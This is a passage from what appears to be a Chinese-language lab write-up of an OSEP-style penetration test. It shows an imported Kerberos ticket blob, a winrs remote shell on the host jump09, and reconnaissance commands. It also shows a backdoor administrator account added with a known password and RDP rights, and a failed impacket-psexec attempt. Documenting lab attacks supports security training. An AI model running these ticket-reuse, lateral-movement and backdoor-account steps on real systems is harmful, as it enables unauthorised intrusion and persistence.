TgbLA2r2LCbcma1FNe+euWPe7LjPy9Uq0sXC0hnyUX5I4C6CQldbCGQAI8ct6XCFuuBxoAlr71FMTqLZ
wGaUaKiC1tWgUQHSJlpbLGHW23YrB0ggfPFtpVW5hXOUA0pHtn8gni/E9OUASSpGDqwF24X7wZr1EuV3
Wp8COu4JpECiQfs4fDGAPlUeCnLUn6H5ZLrAxCfij1Kc4Qdn9c/FhiTaNl75ikrEg02b6DGCn1E9JdSG
QBIu8k6BKkGjjDr1BzE2QkxsWQ/NRM4fsFS/gSh/bfWxIUnAnct6NxlcO1gu7gzu2G6JTl31RYDn4oPA
EqJ+Npsj7hV6pYRpBT7fw4QayNLRmJkhH8wYrtiJThR+IfyE4Wj4ZqIeRlqOVFGbwjtgNZyKBRWi4246
NnUzHBPgz37yTU66m2V4+GWHS9njj1YqBK7AAWfefMGZNz9KGWEYZcOHFByzRNJIvlPXPzwArr3YMp1C
kJ0ti4LUm9nm9Md7/iDBLPqhhKLWmi//60732CbTHUiHSyPhQyYlvlWiPmgwUQxshItn8/N2Wv/t+fgq
+bNV/iSPEj242ZReNuZ3Mx0OyTXaWjgmZY4jlefqHnM0ZHUwsJmbfiQCH+tNKqqDkSawexRvJPjyQtrK
v1vGapwwn60bvD0GxLpugyZL0bQqDrtQMDAg2RxFV0yRZfx2u2kjrgVUNgLsoJvVRKRWBgGVcaup0kcT
blHOm5J6VPexE+m4fUejU/zKTlyIyKoRGSZdYMaU8RK42zodqkDKLPXLE9yAyEpIHMig0jhglgdQj/WE
rnMaBDo9O5kBx6q+riO1cZ+2/dQiOQ+Yug4efnYzcKv6mP/WvXF27fwL8F2prCxOMWT5kA+A845etPDK
Y7Wi/9w8+Dubbgl9Q5GeC9pi/oZbI15eMhzWKkQC8YYK03Vd+UvkyFP1SOOgBEtzWurjhmzSi/niM5sg
hUxrhLkG+vgYJYZuZbfBnK9g3sNSWzE0+aXN+hv0LY3/mYSfXIY/GpeWoxaFf/k23eClVdxleZiM/+FJ
5IOH+nL7StQDBzPmlvWBtiYxcGIY1kc8HVymDr/KvVc98TiSyR00pLEiOwTfNWF+qEA3PoZNIEgmsVUj
v4ejI3ukH/bDcuGnLxajgecwgeSgAwIBAKKB3ASB2X2B1jCB06CB0DCBzTCByqAbMBmgAwIBEaESBBAH
cGkfMNx5AkK9MOnBe7qgoRAbDk9QUy5DT01QTFkuQ09NohowGKADAgEKoREwDxsNYWRtaW5pc3RyYXRv
cqMHAwUAQKEAAKURGA8yMDIyMDczMTE0MzYxM1qmERgPMjAyMjA4MDEwMDM2MTNapxEYDzIwMjIwODA3
MTQzNjEzWqgQGw5PUFMuQ09NUExZLkNPTakpMCegAwIBAqEgMB4bBXdpbnJtGxVqdW1wMDkub3BzLmNv
bXBseS5jb20=
[+] Ticket successfully imported!
PS C:\\Users\\Administrator\\Desktop> **winrs -r:jump09.ops.comply.com cmd**
winrs -r:jump09.ops.comply.com cmd
Microsoft Windows [Version 10.0.17763.1339]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\\Users\\administrator.OPS>ipconfig
C:\\Users\\administrator.OPS>whoami
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 172.16.64.167
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.64.254
C:\\Users\\administrator.OPS>hostname
whoami
ops\\administrator
C:\\Users\\administrator.OPS>
hostname
jump09
存在一个问题,采用winrs
远程连接jump09
,用certutil
下载文件会提示超时,如下所示:
CertUtil: -URLCache command FAILED: 0x80072ee2 (WinHttp: 12002 ERROR_WINHTTP_TIMEOUT)
CertUtil: The operation timed out
采用一个比较笨的办法,因为是管理员,所以干脆加一个用户:
C:\\Users\\administrator.OPS\\Desktop>**net user crack Passw0rd! /add**
C:\\Users\\administrator.OPS\\Desktop>
net user crack Passw0rd! /add
The command completed successfully.
C:\\Users\\administrator.OPS\\Desktop>**net localgroup administrators crack /add**
C:\\Users\\administrator.OPS\\Desktop>
net localgroup administrators crack /add
The command completed successfully.
C:\\Users\\administrator.OPS\\Desktop>**net localgroup "Remote Desktop Users" crack /add**
C:\\Users\\administrator.OPS\\Desktop>
net localgroup "Remote Desktop Users" crack /add
The command completed successfully.
C:\\Users\\administrator.OPS\\Desktop>net user crack
C:\\Users\\administrator.OPS\\Desktop>
net user crack
User name crack
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 7/31/2022 7:57:03 AM
Password expires 9/11/2022 7:57:03 AM
Password changeable 8/1/2022 7:57:03 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators *Remote Desktop Users
*Users
Global Group memberships *None
The command completed successfully.
psexec
连的时候,出现错误:
┌──(kali㉿kali)-[~/…/osep/tools/mimikatz_trunk/x64]
└─$ impacket-psexec crack:Passw0rd\\[email protected]
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 172.16.64.167.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.